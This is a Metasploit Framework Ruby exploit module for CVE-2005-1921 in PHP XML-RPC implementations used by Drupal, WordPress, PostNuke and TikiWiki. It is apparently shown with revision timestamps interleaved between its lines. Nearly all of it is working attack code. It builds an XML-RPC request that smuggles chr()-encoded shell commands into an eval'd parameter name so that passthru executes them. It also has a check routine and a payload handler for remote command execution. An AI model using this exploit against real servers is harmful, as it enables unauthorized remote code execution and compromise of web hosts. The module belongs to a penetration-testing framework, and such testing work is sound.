2007-02-18 00:10:39 +00:00
##
# $Id:$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
2006-01-20 20:18:55 +00:00
require 'msf/core'
module Msf
2007-01-05 05:58:13 +00:00
class Exploits :: Unix :: Webapp :: PhpXmlrpcEval < Msf :: Exploit :: Remote
2006-01-20 20:18:55 +00:00
include Exploit :: Remote :: HttpClient
2007-01-05 05:58:13 +00:00
# XXX This module needs an overhaul
2006-01-20 20:18:55 +00:00
def initialize ( info = { } )
super ( update_info ( info ,
'Name' = > 'PHP XML-RPC Arbitrary Code Execution' ,
'Description' = > %q{
2006-01-27 05:00:35 +00:00
This module exploits an arbitrary code execution flaw
discovered in many implementations of the PHP XML - RPC module .
This flaw is exploitable through a number of PHP web
applications , including but not limited to Drupal , Wordpress ,
Postnuke , and TikiWiki .
2006-01-20 20:18:55 +00:00
} ,
'Author' = > [ 'hdm' , 'cazz' ] ,
2006-01-21 22:10:20 +00:00
'License' = > MSF_LICENSE ,
2006-01-20 20:18:55 +00:00
'Version' = > '$Revision$' ,
'References' = >
[
2006-01-27 05:00:35 +00:00
[ 'BID' , '14088' ] ,
[ 'CVE' , '2005-1921' ] ,
[ 'MIL' , '49' ] ,
2006-01-20 20:18:55 +00:00
] ,
'Privileged' = > false ,
2006-01-27 05:00:35 +00:00
'Platform' = > [ 'unix' , 'solaris' ] ,
2006-01-20 20:18:55 +00:00
'Payload' = > {
2006-01-27 05:00:35 +00:00
'Space' = > 512 ,
'DisableNops' = > true ,
'Keys' = > [ 'cmd' , 'cmd_bash' ] ,
2006-01-20 20:18:55 +00:00
} ,
2006-01-27 05:00:35 +00:00
'Targets' = > [ [ 'Automatic' , { } ] , ] ,
'DefaultTarget' = > 0 ,
2006-01-20 20:18:55 +00:00
'DisclosureDate' = > 'Jun 29 2005'
2006-01-27 05:00:35 +00:00
) )
2006-01-20 20:18:55 +00:00
2006-01-27 05:00:35 +00:00
register_options (
[
OptString . new ( 'PATH' , [ true , " Path to xmlrpc.php " , '/xmlrpc.php' ] ) ,
] , self . class
)
2006-01-26 02:07:59 +00:00
deregister_options (
'HTTP::junk_params' , # not your typical POST, so don't inject params.
'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
)
2006-01-20 20:18:55 +00:00
end
2006-01-26 02:07:59 +00:00
def go ( command )
2006-01-20 20:18:55 +00:00
2006-01-27 05:00:35 +00:00
encoded = command . unpack ( " C* " ) . collect { | x | " chr( #{ x } ) " } . join ( '.' )
wrapper = Rex :: Text . rand_text_alphanumeric ( rand ( 128 ) + 32 )
cmd = " echo(' #{ wrapper } '); passthru( #{ encoded } ); echo(' #{ wrapper } ');; "
2006-01-20 20:18:55 +00:00
2006-01-27 05:00:35 +00:00
xml =
'<?xml version="1.0"?>' +
" <methodCall> " +
" <methodName> " + Rex :: Text . rand_text_alphanumeric ( rand ( 128 ) + 32 ) + " </methodName> " +
" <params><param> " +
" <name> " + Rex :: Text . rand_text_alphanumeric ( rand ( 128 ) + 32 ) + " '); #{ cmd } //</name> " +
" <value> " + Rex :: Text . rand_text_alphanumeric ( rand ( 128 ) + 32 ) + " </value> " +
" </param></params> " +
" </methodCall> " ;
2006-01-20 20:18:55 +00:00
2006-12-28 23:42:36 +00:00
res = send_request_cgi ( {
2006-01-27 05:00:35 +00:00
'uri' = > datastore [ 'PATH' ] ,
'method' = > 'POST' ,
2006-12-28 23:42:36 +00:00
'ctype' = > 'application/xml' ,
2006-01-27 05:00:35 +00:00
'data' = > xml ,
2006-12-28 23:42:36 +00:00
} , 5 )
2006-01-20 20:18:55 +00:00
2006-01-27 05:00:35 +00:00
if ( res and res . body )
b = / #{ wrapper } (.*) #{ wrapper } /sm . match ( res . body )
if b
return b . captures [ 0 ]
elsif datastore [ 'HTTP::chunked' ] == true
b = / chunked Transfer-Encoding forbidden / . match ( res . body )
if b
raise RuntimeError , 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
end
end
end
2006-01-20 20:18:55 +00:00
2006-01-27 05:00:35 +00:00
return nil
end
def check
response = go ( " echo ownable " )
if ( ! response . nil? and response =~ / ownable /sm )
return Exploit :: CheckCode :: Vulnerable
end
return Exploit :: CheckCode :: Safe
2006-01-20 20:18:55 +00:00
end
2006-01-27 05:00:35 +00:00
def exploit
response = go ( payload . encoded )
if response == nil
print_status ( 'exploit failed' )
2006-01-26 02:07:59 +00:00
else
2006-01-27 05:00:35 +00:00
if response . length == 0
print_status ( 'exploit successful' )
else
print_status ( " Command returned #{ response } " )
end
handler
end
end
2006-01-20 20:18:55 +00:00
end
end